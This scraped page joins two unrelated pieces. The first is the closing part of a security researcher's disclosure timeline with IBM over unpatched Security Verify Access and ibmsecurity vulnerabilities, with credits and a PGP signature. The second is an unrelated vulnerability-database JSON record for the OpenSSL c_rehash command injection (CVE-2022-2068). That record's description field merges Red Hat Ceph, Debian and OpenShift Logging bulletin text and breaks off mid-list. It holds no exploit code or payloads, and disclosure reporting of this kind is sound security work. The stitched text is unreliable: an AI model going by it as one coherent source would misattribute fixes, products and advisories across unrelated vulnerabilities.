- Jul 14, 2023: I said that (1) I was still waiting for information about CVE-2023-25927, (2) I did not have any information regarding security patches for ibmsecurity and (3) I asked IBM to provide me with the final list of vulnerabilities that would be patched in the 10.0.7. Since the list of confirmed vulnerabilities was quite long, I wanted to confirm that nothing was missed.
- Jul 28, 2023: IBM said that they did not know if CVE-2023-25927 is one of the reported vulnerabilities and in any case, it is impossible to edit the security bulletin and give credits.
- Aug 16, 2023: IBM asked if additional assistance was required [NB: IBM likely wanted to close this ticket while no security patches were published].
- Aug 17, 2023: I asked again information about ibmsecurity and CVE-2023-25927.
- Oct 20, 2023: IBM said they were still analysing the requests (final list of patched vulnerabilties, security patches of ibmsecurity and status of CVE-2023-25927).
- Oct 25, 2023: IBM asked to organize a meeting.
- Oct 25, 2023: I replied that I was still waiting for the final list of vulnerabilities that would be fixed in version 10.0.7. There was also no information regarding security patches for ibmsecurity.
- Oct 25, 2023: IBM replied they wanted to discuss about the vulnerabilities in a meeting.
- Oct 29, 2023: IBM asked to organize a meeting again.
- Oct 30, 2023: I accepted the meeting and I asked IBM to provide the list of vulnerabilities that would be patched with their current status. I also asked the status of ibmsecurity.
- Oct 30, 2023: IBM asked to have a meeting on Nov 7, 2023.
- Nov 2, 2023: I confirmed my presence to the meeting.
- Nov 5, 2023: IBM confirmed the meeting.
- Nov 7, 2023: Meeting with IBM. IBM provided me with a new report containing new feedbacks for several vulnerabilities. Also IBM confirmed that several vulnerabilities would be patched in 2024 and ibmsecurity would be patched in December 2023. IBM asked me to review a specific vulnerability that appears to be invalid (V-[REDACTED] - Insecure SSLv3 connections to the DSC servers).
- Nov 21, 2023: IBM asked me to review the new report shared by IBM.
- Nov 28, 2023: IBM asked for updates.
- Dec 4, 2023: I answered that I did not have anymore access to the test infrastructure and IBM had to wait for my analysis until I get again access to the test infrastructure.
- Dec 4, 2023: IBM asked me to check the vulnerabilities as soon as possible.
- Dec 21, 2023: I got access to a test infrastructure and reviewed some vulnerabilities.
- Dec 21, 2023: I sent a new analysis to IBM, containing details of 4 vulnerabilities.
- Dec 27, 2023: IBM confirmed the reception of the new analysis.
- Jan 15, 2024: IBM asked me to update ISVA and recheck all the vulnerabilities.
- Jan 16, 2024: I asked IBM if ibmsecurity was also patched.
- Jan 16, 2024: IBM confirmed that a new case must be opened for ibmsecurity to get security patches(!).
- Jan 22, 2024: IBM wanted to organize a new meeting.
- Jan 22, 2024: I replied that I failed to understand the issue with the ibmsecurity library and that I had a written confirmation by IBM that security patches would be provided. The vulnerabilities found in ibmsecurity were reported in March 2023 (10 months ago).
- Jan 22, 2024: I informed IBM that I discovered(!) a new security bulletin thanks to @CVEnew: https://www.ibm.com/support/pages/node/7106586, but only 15 vulnerabilities were listed instead of the 35 vulnerabilities confirmed by IBM. I asked IBM to clarify the situation as it looked like less than half of vulnerabilities were indeed patched.
- Jan 24, 2024: IBM created a new case for ibmsecurity.
- Jan 29, 2024: IBM confirmed that 5 vulnerabilities had not been patched in the latest version (10.0.7).
- Jan 29, 2024: I reached IBM to get the status of 15 unpatched vulnerabilities. I provided the updated analysis to IBM.
- Feb 7, 2024: IBM confirmed that some of the vulnerabilities were "being processed" and that some of vulnerabilities had been also silently patched and no security bulletins had been published.
- Feb 20, 2024: IBM asked for updates.
- Feb 20, 2024: I asked when would be the release date for ISVA 10.0.8 and the complete list of vulnerabilities that would be patched in this release.
- Feb 20, 2024: IBM confirmed that the 10.0.8 release would be published in mid-2024.
- Feb 23, 2024: I sent a new vulnerability to IBM "Authentication Bypass on IBM Security Verify Runtime".
- Feb 23, 2024: IBM confirmed the reception of the vulnerability and asked to close the ticket.
- Feb 23, 2024: I said that since some vulnerabilities had not been patched, the ticket must stay open.
- Feb 23, 2024: IBM said that they cannot keep the ticket open and they needed to close it.
- Feb 23, 2024: I explained that the vulnerabilities were reported over a year ago and IBM confirmed they had not fully fixed in the latest version and that some vulnerabilities were also still under evaluation. I said that I would agree to close this ticket if IBM could confirm that all vulnerabilities reported in the ticket had been correctly fixed in the latest version. I also asked IBM to provide the corresponding security bulletins.
- Feb 27, 2024: Regarding the authentication bypass, IBM replied that the runtime was supposed to be in the intranet zone.
- Feb 28, 2024: I asked IBM to clarify where in the documentation specified that the runtime should not be exposed. For example, in https://www.ibm.com/docs/en/sva/10.0.7?topic=support-docker-image-verify-access-runtime, it was not explained that exposing this runtime on the network was a high security risk.
- Mar 4, 2024: Regarding the vulnerabilities found in ibmsecurity, IBM said that any security vulnerability found in ibmsecurity must be reported by opening an issue in the Github repository.
- Mar 8, 2024: IBM confirmed they were able to reproduce the authentication bypass vulnerability.
- Mar 12, 2024: IBM confirmed they would add an optional MTLS authentication in the next release (10.0.8) and they would update the ISVA documentation to block any attempt of the authentication bypass vulnerability.
- Mar 29, 2024: IBM published a new security bulletin: https://www.ibm.com/support/pages/node/7145400.
- Mar 29, 2024: IBM confirmed that any security vulnerability found in ibmsecurity must be reported by opening an issue in the Github repository.
- Apr 1, 2024: Creation of https://github.com/IBM-Security/ibmsecurity/issues/416.
- Apr 2, 2024: IBM confirmed the reception of the report https://github.com/IBM-Security/ibmsecurity/issues/416#issuecomment-2032110397.
- Apr 3, 2024: https://github.com/IBM-Security/ibmsecurity/issues/416 was entirely redacted by IBM.
- Apr 5, 2024: I asked if the vulnerabilities would be patched in the #416 issue (https://github.com/IBM-Security/ibmsecurity/issues/416).
- Apr 6, 2024: Issue #416 (https://github.com/IBM-Security/ibmsecurity/issues/416) closed.
- Apr 6, 2024: I added again the content of https://github.com/IBM-Security/ibmsecurity/issues/416 and asked if CVEs would be published.
- Apr 10, 2024: Security bulletin for ibm security published: https://www.ibm.com/support/pages/node/7147932.
- Apr 10, 2024: I reached IBM regarding a new security bulletin, with a potential vulnerability I reported https://www.ibm.com/support/pages/node/7145828.
- Apr 10, 2024: IBM said this security bulletin was unrelated to the vulnerabilities I reported.
- Apr 15, 2024: IBM confirmed that the final vulnerabilities would be fixed in ISVA 10.0.8.
- Apr 15, 2024: I provided a list of unfixed vulnerabilities and asked for more information.
- Apr 16, 2024: IBM confirmed that all the unfixed vulnerabilities would be fixed in ISVA 10.0.8 and asked to close the ticket.
- Apr 16, 2024: I confirmed that this ticket can be closed only when the security patches are available.
- Apr 16, 2024: IBM confirmed they wanted to close the ticket because nothing would be updated before mid-2024.
- Apr 17, 2024: I replied that "It makes no sense to close this ticket until the vulnerabilities have been fixed. The fact that the vulnerabilities are fixed mid-year is a decision made by IBM. IBM was made aware of these vulnerabilities over a year ago, and yet we are still waiting for security patches. If this ticket is closed, I would consider that the vulnerabilities have been fixed and it is perfectly fine to publish the technical analysis."
- May 6, 2024: IBM closed the existing ticket and opened new tickets for the remaining vulnerabilities.
- May 6, 2024: I contacted IBM PSIRT asking if it was fine to publish the vulnerabilities since the ticket was closed by IBM.
- May 7, 2024: I reopened the ticket stating that some of the patched vulnerabilities did not receive a CVE and there were also some unpatched vulnerabilities. I asked IBM to provide me with the CVE assigned to each vulnerability. I also asked IBM to confirm that, since this ticket had been closed by IBM, all the vulnerabilities had been fixed and that I would be able to publish the technical details.
- May 8, 2024: IBM said they would review the list of vulnerabilities.
- May 10, 2024: IBM PSIRT asked me not to publish technical details of unpatched vulnerabilities.
- May 17, 2024: IBM provided me with an incomplete list of CVEs, with different vulnerabilities under the same CVE identifier and asked to close the ticket.
- May 20, 2024: IBM asked for my comments on the list of CVEs.
- May 20, 2024: I confirmed that several CVEs were missing and the list was incomplete.
- May 21, 2024: IBM provided me with an explanation regarding the missing CVEs.
- May 21, 2024: I asked IBM to quote their explanation in the security advisory.
- May 21, 2024: IBM asked to have a meeting.
- May 22, 2024: I replied that I would prefer written communication since it was very difficult to track the status of the vulnerabilities with (1) CVEs obtained only several months after the release of security bulletins, (2) tickets closed by IBM for unpatched vulnerabilities, (3) vulnerabilities in ibmsecurity which could be corrected by IBM and which could then no longer be managed by IBM, and (4) missing CVEs.
- May 22, 2024: IBM asked to have a meeting to remove any confusion.
- May 23, 2024: I replied that there's not much confusion except missing CVEs for silently patched vulnerabilities and lack of communication from IBM when releasing security patches. I asked IBM to share the CVEs with the corresponding vulnerabilities and indicate the security bulletins with the list of corresponding vulnerabilities.
- May 24, 2024: IBM stated they would provide me with additional CVEs.
- May 30, 2024: I confirmed that the creation of additional CVEs is fair.
- Jun 2, 2024: IBM confirmed 3 new CVEs in a new security bulletin: https://www.ibm.com/support/pages/node/7155356.
- Jun 3, 2024: I asked IBM the release date of the 10.0.8 version.
- Jun 3, 2024: IBM confirmed that the exact date was not yet decided.
- Jun 6, 2024: IBM asked if I had comments about the remaining vulnerabilities.
- Jun 8, 2024: I asked IBM the status of a previously patched vulnerability.
- Jun 10, 2024: IBM confirmed that this vulnerability had not been previously patched and would be patched in the 10.0.8 release.
- Jun 11, 2024: IBM asked to create separate cases for the remaining vulnerabilities.
- Jun 19, 2024: IBM asked if I needed assistance.
- Jun 23, 2024: IBM confirmed that the 10.0.8 version was released and that they would close the ticket tracking the vulnerabilities.
- Jun 26, 2024: I asked IBM to provide the corresponding CVEs and the link of the security bulletin.
- Jun 27, 2024: IBM provided me with the link to the security bulletin: https://www.ibm.com/support/pages/node/7158790 and said that the 10.0.8 version was released with all the patched vulnerabilities. IBM closed the ticket.
- Jul 3, 2024: I reopened the ticket and asked IBM to provide me with the list of vulnerabilities with the corresponding CVEs since I was not able to correctly map the CVEs to the vulnerabilities I reported.
- Jul 8, 2024: IBM provided me with the list of CVEs. IBM closed the ticket.
- Sep 7, 2024: I sent an email to IBM PSIRT stating that I was going to publish the security advisory and that some CVEs were still missing. I also stated that CVE-2023-38371 seemed to be an error since it was confirmed not to be a vulnerability according to our previous email exchanges.
- Sep 9, 2024: I asked IBM to provide me with an official link regarding the runtime authentication bypass, to publish it in the security advisory.
- Sep 13, 2024: IBM PSIRT provided me with (1) links regarding the runtime authentication bypass and (2) additional CVEs. They also confirmed that at least one vulnerability was not fixed and asked me not to disclose this finding until it was patched. No information was provided when this vulnerability would be patched.
- Nov 1, 2024: A security advisory is published.
Credits
These vulnerabilities were found by Pierre Barre aka Pierre Kim (@PierreKimSec).
References
https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html
https://pierrekim.github.io/advisories/2024-ibm-security-verify-access.txt
https://pierrekim.github.io/blog/2024-11-01-ibmsecurity-4-vulnerabilities.html
https://pierrekim.github.io/advisories/2024-ibmsecurity.txt
https://www.ibm.com/support/pages/node/7106586
https://www.ibm.com/support/pages/node/7145400
https://www.ibm.com/support/pages/node/7155356
https://www.ibm.com/support/pages/node/7158790
Disclaimer
This advisory is licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEoSgI9MSrzxDXWrmCxD4O2n2TLbwFAmckrf4ACgkQxD4O2n2T LbzphQ//dkcrCH8Q+yNrjdYoxvY/wXwc1JfgXxmLK7Ns3N5qFJVT70Uea6HjIoHz eJQurricioTP8jG48J2uzIt7l4G4Kgv0zP+aPN/KXjfYghu46N4G29458OgXTHVe ecOmouy/za1DG6qtST+sbicDhX5oku4VtdQ+NtDXaoLUAkADp/wJ3rLv5Fdw7gxQ VR0OMUTsy50Vv1bRN2R77ZAs/odAY67pQfTw8QpKLDDLBZveeAwBLgc66rQ+KZjq mPbLUULFlZp3+EYnR+XyZXu2nNGZDhTVMKAYCGzuqr3/boIz1BF7rifK07tL8+EE +NQQK3kzauWuQ/Sl5X20kfvdC91g7d/G93Me+Uz9iSfB9cyDfAdCLNf6fyYi/xjE qz6HNe2capSG7GBeCK6Q8ffb95kojjKrmyL2eKj2Yz5ZCWuDXa0L6pLwHZ9KSyjj 24kykmiHI4bCKBCXazBVYcdguk+6PCcenAGxLIpKdmTcMvaUUbN/c2jUenjV8/As +akcA48mNjuITE+Qei9kn7R5huTSCZffws9j4r0P86dst0ZkYfNSWgThatk2NRwC V8D2DOXdxpXThuOAMfN4b9ViLYTeHm2/JGvl0RLQNyNSv2rWeeEch6Z69NsS/Fq7 Y7L55juYeCFtkTrdYA+tkaUHlvX8uQC9GoKkcUOfYV6utGQ4fnU= =3Ax6 -----END PGP SIGNATURE-----
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h610s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "openssl",
"scope": "lt",
"trust": 1.0,
"vendor": "openssl",
"version": "3.0.4"
},
{
"_id": null,
"model": "snapmanager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "aff a400",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "ontap select deploy administration utility",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "35"
},
{
"_id": null,
"model": "sannav",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": null
},
{
"_id": null,
"model": "openssl",
"scope": "gte",
"trust": 1.0,
"vendor": "openssl",
"version": "1.0.2"
},
{
"_id": null,
"model": "solidfire",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h615c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "hci management node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "sinec ins",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "1.0"
},
{
"_id": null,
"model": "openssl",
"scope": "lt",
"trust": 1.0,
"vendor": "openssl",
"version": "1.1.1p"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "11.0"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "36"
},
{
"_id": null,
"model": "fas 8300",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "bootstrap os",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fas 8700",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fas a400",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "openssl",
"scope": "lt",
"trust": 1.0,
"vendor": "openssl",
"version": "1.0.2zf"
},
{
"_id": null,
"model": "aff 8700",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "aff 8300",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h610c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "element software",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "sinec ins",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "1.0"
},
{
"_id": null,
"model": "openssl",
"scope": "gte",
"trust": 1.0,
"vendor": "openssl",
"version": "1.1.1"
},
{
"_id": null,
"model": "smi-s provider",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "openssl",
"scope": "gte",
"trust": 1.0,
"vendor": "openssl",
"version": "3.0.0"
},
{
"_id": null,
"model": "ontap antivirus connector",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "santricity smi-s provider",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-2068"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "168022"
},
{
"db": "PACKETSTORM",
"id": "168112"
},
{
"db": "PACKETSTORM",
"id": "170741"
},
{
"db": "PACKETSTORM",
"id": "170196"
},
{
"db": "PACKETSTORM",
"id": "170165"
},
{
"db": "PACKETSTORM",
"id": "170179"
}
],
"trust": 0.6
},
"cve": "CVE-2022-2068",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2022-2068",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.3,
"id": "CVE-2022-2068",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2022-2068",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-2068",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2022-2068",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2022-2068",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-2068"
},
{
"db": "NVD",
"id": "CVE-2022-2068"
},
{
"db": "NVD",
"id": "CVE-2022-2068"
}
]
},
"description": {
"_id": null,
"data": "In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze). (CVE-2022-2068). Description:\n\nRed Hat Ceph Storage is a scalable, open, software-defined storage platform\nthat combines the most stable version of the Ceph storage system with a\nCeph management platform, deployment utilities, and support services. \n\nSpace precludes documenting all of these changes in this advisory. Bugs fixed (https://bugzilla.redhat.com/):\n\n2031228 - CVE-2021-43813 grafana: directory traversal vulnerability\n2044628 - CVE-2022-21673 grafana: Forward OAuth Identity Token can allow users to access some data sources\n2115198 - build ceph containers for RHCS 5.2 release\n\n5. \n\nFor the oldstable distribution (buster), this problem has been fixed\nin version 1.1.1n-0+deb10u3. \n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 1.1.1n-0+deb11u3. \n\nWe recommend that you upgrade your openssl packages. \n\nFor the detailed security status of openssl please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/openssl\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmK4pF0ACgkQEMKTtsN8\nTjYP5g//SyfB1W/vUNmgeSp2kKu3vt9CPwoXMK8nhTcA7iYhkxIJTFxAWDpn+4S7\nW4kYyxMRFSIHKv4FLiLgi/Vzn4g1kB1UvKv05CFhEJqpWMyyRj6FdmebLlkLG0eE\nIGsZoQl9be+lRJ+E4oMMkrRkbJV5II7s69vdxFDh4893Ndx05GWWvXT5Doc5gFMi\nNoNabBH47GFU6aGDwVJU+xooBT6s4QMOrgVKYbxhM5PO98HQzk0zv0Z6YRx7FzKD\nhYMN/t6A8qj4zMQqJqM+44q9zpDryyolGLewvgOit1HFFnLlBf4wsdBvE7AGhvGs\nLam5OXLhlwlQT6gBNd4XFAShdEZGLVF2DCgKzMh5cG5r2W10ewfHHyOR4CnkMQQP\nePA8YvhVwSH3I5jOTS75A18LXpoRJKRXQuQ7v9di2C8qRZ0qnM95h0KzH9/UKyUc\nTmF09MTKWoFCkCtyzucdPnoyUPhdScJc08jcGJ37MCb8uKI4F5jVImLnHC6qS6Oc\nGab3OPIDzS8I1rro0J1k8RJE1E8XvfCxgVAOoebn0mst8qT+38hqsTFykG+uq3dN\nsfhwI+E8iOeVOapyDVzxz8DfIkyBdnFsM4cg9VxDPOOllN+BknySqvzxu+aYpMFz\nK/D6g421XIIXPXD+sP/w1ENPV7LFobRR7KXUWvjS5l/Ir8dhPdQ=\n=tiWq\n-----END PGP SIGNATURE-----\n. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Description:\n\nLogging Subsystem 5.5.0 - Red Hat OpenShift\n\nSecurity Fix(es):\n\n* kubeclient: kubeconfig parsing error can lead to MITM attacks\n(CVE-2022-0759)\n\n* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)\n\n* golang: out-of-bounds read in golang.org/x/text/language leads to DoS\n(CVE-2021-38561)\n\n* prometheus/client_golang: Denial of service using\nInstrumentHandlerCounter (CVE-2022-21698)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n3. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter\n2058404 - CVE-2022-0759 kubeclient: kubeconfig parsing error can lead to MITM attacks\n2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS\n2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-1415 - Allow users to tune fluentd\nLOG-1539 - Events and CLO csv are not collected after running `oc adm must-gather --image=$downstream-clo-image `\nLOG-1713 - Reduce Permissions granted for prometheus-k8s service account\nLOG-2063 - Collector pods fail to start when a Vector only Cluster Logging instance is created. \nLOG-2134 - The infra logs are sent to app-xx indices\nLOG-2159 - Cluster Logging Pods in CrashLoopBackOff\nLOG-2165 - [Vector] Default log level debug makes it hard to find useful error/failure messages. \nLOG-2167 - [Vector] Collector pods fails to start with configuration error when using Kafka SASL over SSL\nLOG-2169 - [Vector] Logs not being sent to Kafka with SASL plaintext. \nLOG-2172 - [vector]The openshift-apiserver and ovn audit logs can not be collected. \nLOG-2242 - Log file metric exporter is still following /var/log/containers files. \nLOG-2243 - grafana-dashboard-cluster-logging should be deleted once clusterlogging/instance was removed\nLOG-2264 - Logging link should contain an icon\nLOG-2274 - [Logging 5.5] EO doesn\u0027t recreate secrets kibana and kibana-proxy after removing them. \nLOG-2276 - Fluent config format is hard to read via configmap\nLOG-2290 - ClusterLogging Instance status in not getting updated in UI\nLOG-2291 - [release-5.5] Events listing out of order in Kibana 6.8.1\nLOG-2294 - [Vector] Vector internal metrics are not exposed via HTTPS due to which OpenShift Monitoring Prometheus service cannot scrape the metrics endpoint. \nLOG-2300 - [Logging 5.5]ES pods can\u0027t be ready after removing secret/signing-elasticsearch\nLOG-2303 - [Logging 5.5] Elasticsearch cluster upgrade stuck\nLOG-2308 - configmap grafana-dashboard-elasticsearch is being created and deleted continously\nLOG-2333 - Journal logs not reaching Elasticsearch output\nLOG-2337 - [Vector] Missing @ prefix from the timestamp field in log record. \nLOG-2342 - [Logging 5.5] Kibana pod can\u0027t connect to ES cluster after removing secret/signing-elasticsearch: \"x509: certificate signed by unknown authority\"\nLOG-2384 - Provide a method to get authenticated from GCP\nLOG-2411 - [Vector] Audit logs forwarding not working. \nLOG-2412 - CLO\u0027s loki output url is parsed wrongly\nLOG-2413 - PriorityClass cluster-logging is deleted if provide an invalid log type\nLOG-2418 - EO supported time units don\u0027t match the units specified in CRDs. \nLOG-2439 - Telemetry: the managedStatus\u0026healthStatus\u0026version values are wrong\nLOG-2440 - [loki-operator] Live tail of logs does not work on OpenShift\nLOG-2444 - The write index is removed when `the size of the index` \u003e `diskThresholdPercent% * total size`. \nLOG-2460 - [Vector] Collector pods fail to start on a FIPS enabled cluster. \nLOG-2461 - [Vector] Vector auth config not generated when user provided bearer token is used in a secret for connecting to LokiStack. \nLOG-2463 - Elasticsearch operator repeatedly prints error message when checking indices\nLOG-2474 - EO shouldn\u0027t grant cluster-wide permission to system:serviceaccount:openshift-monitoring:prometheus-k8s when ES cluster is deployed. [openshift-logging 5.5]\nLOG-2522 - CLO supported time units don\u0027t match the units specified in CRDs. \nLOG-2525 - The container\u0027s logs are not sent to separate index if the annotation is added after the pod is ready. \nLOG-2546 - TLS handshake error on loki-gateway for FIPS cluster\nLOG-2549 - [Vector] [master] Journald logs not sent to the Log store when using Vector as collector. \nLOG-2554 - [Vector] [master] Fallback index is not used when structuredTypeKey is missing from JSON log data\nLOG-2588 - FluentdQueueLengthIncreasing rule failing to be evaluated. \nLOG-2596 - [vector]the condition in [transforms.route_container_logs] is inaccurate\nLOG-2599 - Supported values for level field don\u0027t match documentation\nLOG-2605 - $labels.instance is empty in the message when firing FluentdNodeDown alert\nLOG-2609 - fluentd and vector are unable to ship logs to elasticsearch when cluster-wide proxy is in effect\nLOG-2619 - containers violate PodSecurity -- Log Exporation\nLOG-2627 - containers violate PodSecurity -- Loki\nLOG-2649 - Level Critical should match the beginning of the line as the other levels\nLOG-2656 - Logging uses deprecated v1beta1 apis\nLOG-2664 - Deprecated Feature logs causing too much noise\nLOG-2665 - [Logging 5.5] Sometimes collector fails to push logs to Elasticsearch cluster\nLOG-2693 - Integration with Jaeger fails for ServiceMonitor\nLOG-2700 - [Vector] vector container can\u0027t start due to \"unknown field `pod_annotation_fields`\" . \nLOG-2703 - Collector DaemonSet is not removed when CLF is deleted for fluentd/vector only CL instance\nLOG-2725 - Upgrade logging-eventrouter Golang version and tags\nLOG-2731 - CLO keeps reporting `Reconcile ServiceMonitor retry error` and `Reconcile Service retry error` after creating clusterlogging. \nLOG-2732 - Prometheus Operator pod throws \u0027skipping servicemonitor\u0027 error on Jaeger integration\nLOG-2742 - unrecognized outputs when use the sts role secret\nLOG-2746 - CloudWatch forwarding rejecting large log events, fills tmpfs\nLOG-2749 - OpenShift Logging Dashboard for Elastic Shards shows \"active_primary\" instead of \"active\" shards. \nLOG-2753 - Update Grafana configuration for LokiStack integration on grafana/loki repo\nLOG-2763 - [Vector]{Master} Vector\u0027s healthcheck fails when forwarding logs to Lokistack. \nLOG-2764 - ElasticSearch operator does not respect referencePolicy when selecting oauth-proxy image\nLOG-2765 - ingester pod can not be started in IPv6 cluster\nLOG-2766 - [vector] failed to parse cluster url: invalid authority IPv6 http-proxy\nLOG-2772 - arn validation failed when role_arn=arn:aws-us-gov:xxx\nLOG-2773 - No cluster-logging-operator-metrics service in logging 5.5\nLOG-2778 - [Vector] [OCP 4.11] SA token not added to Vector config when connecting to LokiStack instance without CLF creds secret required by LokiStack. \nLOG-2784 - Japanese log messages are garbled at Kibana\nLOG-2793 - [Vector] OVN audit logs are missing the level field. \nLOG-2864 - [vector] Can not sent logs to default when loki is the default output in CLF\nLOG-2867 - [fluentd] All logs are sent to application tenant when loki is used as default logstore in CLF. \nLOG-2873 - [Vector] Cannot configure CPU/Memory requests/limits when using Vector as collector. \nLOG-2875 - Seeing a black rectangle box on the graph in Logs view\nLOG-2876 - The link to the \u0027Container details\u0027 page on the \u0027Logs\u0027 screen throws error\nLOG-2877 - When there is no query entered, seeing error message on the Logs view\nLOG-2882 - RefreshIntervalDropdown and TimeRangeDropdown always set back to its original values when switching between pages in \u0027Logs\u0027 screen\n\n6. 